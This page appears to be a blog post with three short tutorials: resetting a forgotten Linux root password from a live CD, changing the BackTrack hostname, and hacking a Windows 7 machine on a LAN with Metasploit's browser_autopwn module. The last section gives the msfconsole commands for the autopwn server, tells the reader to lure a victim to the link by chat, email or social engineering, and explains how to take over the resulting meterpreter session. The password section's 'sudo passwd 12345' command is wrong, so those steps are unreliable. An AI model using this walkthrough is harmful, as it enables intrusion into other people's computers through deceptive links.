How to Reset the Root Password for Linux

At some point we can't remember the Root password for our Linux machine. At that time we stuck in between and we have only option to  re-install linux once again. Today we will learn how to reset root password with Linux live cd.

The only thing you need is a bootable linux live cd.

you can use Ubuntu in "Try Ubuntu"mode, OpenSuse in "Recovery" mode and Backtrack5 in "Forensics" mode. Other live cd  will be fine but it has to be the same architecture (x86 or x64) as your installed system.

Step1: you have to do is to find out the name of the partition on which you installed system in located. If you have only one hard drive it should be sda1 or sda2 but to find out you can use fdisk command.

# fdisk -l

Step2: Once you found the correct partition you have to mount it and have to bind the dev environment

# Sudo mount  /dev/sda1  /mnt

#sudo mount  --bind  /dev/  /mnt/dev

Step3: After that you have to change your root directory from live environment to the installed system.
 # sudo chroot  /mnt 

Step 4: Now you can work in your installed environment and easily set a new root password.

# sudo passwd 12345

Step 5: Finally exit chroot mode and reboot system.

#exit
#sudo reboot

You should now be able to log in as root using the new password 

How to change Backtrack Hostname root@bt#

Here, we see how to change Default Backtrack Hostname to your desired one.

By default your hostname will be bt and can be identified by root@bt# in terminal.

Step 1: To Check your hostname use hostname command.

As you can see my hostname is "bt"

Step 2: To change your hostname, you can run hostname command following your desired name.

hostname csurvivals

To view the change you should open the new terminal.

Step 3: The above command only applied to change for the present session, when you restart hostname service or restart your computer it will back to your earlier hostname (root@bt#)

command to restart service : service hostname restart

Step 4: To make teh hostname permanent, we need to edit the hostname file which resides in /etc/hostname using any editor.

root@bt# vi /etc/hostname
then change the "bt" with your desired name and save the file.

press "i" to insert mode
press "Esc" command mode
type ":w" to save

 

Step 5: Restart hostname service or Restart your computer.

 

How to Hack Windows 7 in LAN using Metaspolit (Metasploit Browser Autopwn)

In nowdays due to firewall restrictions and patch management policies exploitation of systems become more difficult .However one of the most efficient way to use of client side attacks.

Browser Autopwn is one of the client side attack. Here we will examine the effectiveness of the Metasploit Browser Autopwn Module.

The Basic Idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits. When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

Set up Required

Attacker: Backtrack 5

Victim: Windows 7

Step 1:Open Backtrack terminal and type msfconsole

Step 2: Now type use auxiliary/server/browser_autopwn

Step 3: Now set LHOST, PORT, URIPATH

msf auxiliary(browser_autopwn) > set lhost 192.168.5.236

msf auxiliary(browser_autopwn)> set port 4444 (you can use port 80 also) 
msf auxiliary(browser_autopwn) > set uripath / 

msf auxiliary(browser_autopwn) > exploit

Send the link of the server to the victim via chat or email or any social engineering technique.

http://192.168.5.236:8080

You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

 

Conclusion

Most of the organizations are behind proxy firewalls so only the port 80 is allowed and many employees are using social networks these days. An attacker can exploit that and send  malicious link to user through social networks to users. So, Metasploit  Browser Autopwn Module is the proof of how dangerous is to open links that are coming from untrusted sources.